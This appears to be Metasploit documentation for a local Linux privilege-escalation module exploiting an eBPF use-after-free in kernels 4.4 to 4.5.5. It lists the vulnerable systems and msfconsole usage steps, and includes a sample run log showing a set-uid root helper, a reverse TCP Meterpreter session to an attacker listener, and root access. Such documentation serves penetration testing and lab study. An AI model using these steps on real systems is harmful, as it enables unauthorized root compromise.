## Notes

  Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)
  does not properly reference count file descriptors, resulting
  in a use-after-free, which can be abused to escalate privileges.

  The target system must be compiled with `CONFIG_BPF_SYSCALL`
  and must not have `kernel.unprivileged_bpf_disabled` set to 1.

  Note, this module will overwrite the first few lines
  of `/etc/crontab` with a new cron job. The job will
  need to be manually removed.


## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)

  This module was not tested against, but may work against:

  * Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=82
  * Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)


## Creating A Testing Environment

There are a few requirements for this module to work:

  1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04)
  2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04)
  3. fuse needs to be installed (non-default on Ubuntu 16.04)
  
  Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!

  The `libfuse-dev` package must be installed to test live-compiling on the target:

  `apt-get install libfuse-dev=2.9.4-1ubuntu3.1`


## Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: `use exploit/linux/local/bpf_priv_esc
  4. Do: `set session #`
  5. Do: `set verbose true`
  6. Do: `exploit`

## Options

  **MAXWAIT**

  The first stage of this priv esc can take ~35 seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to `120` (seconds)

  **WritableDir**

  A folder we can write files to.  Defaults to `/tmp`

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`


## Scenarios

### Ubuntu 16.04 (with Linux 4.4.0-21-generic)

In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.

  ```
  msf > use exploit/linux/local/bpf_priv_esc 
  msf exploit(linux/local/bpf_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/bpf_priv_esc) > set verbose true
  verbose => true
  msf exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf exploit(linux/local/bpf_priv_esc) > run
  
  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [+] Kernel version 4.4.0-21-generic appears to be vulnerable
  [+] fuse package is installed
  [+] /tmp/fuse_mount doesn't exist
  [+] Kernel config has CONFIG_BPF_SYSCALL enabled
  [+] Unprivileged BPF loading is permitted
  [+] libfuse-dev is installed
  [+] gcc is installed
  [+] pkg-config is installed
  [*] Live compiling exploit on system...
  [*] Writing '/tmp/hello.c' (2682 bytes) ...
  [*] Writing '/tmp/doubleput.c' (5168 bytes) ...
  [*] Writing '/tmp/suidhelper.c' (333 bytes) ...
  [*] Uploading payload...
  [*] Writing '/tmp/.FVfiRBKRDX7r' (285 bytes) ...
  [*] Launching exploit. This may take up to 120 seconds.
  [+] Success! set-uid root /tmp/suidhelper
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (861348 bytes) to 172.16.191.141
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.141:34804) at 2018-12-15 00:20:04 -0500
  [+] Deleted /tmp/hello.c
  [+] Deleted /tmp/hello
  [+] Deleted /tmp/doubleput.c
  [+] Deleted /tmp/doubleput
  [+] Deleted /tmp/suidhelper.c
  [+] Deleted /tmp/.FVfiRBKRDX7r
  [+] Deleted /tmp/fuse_mount
  
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.141
  OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

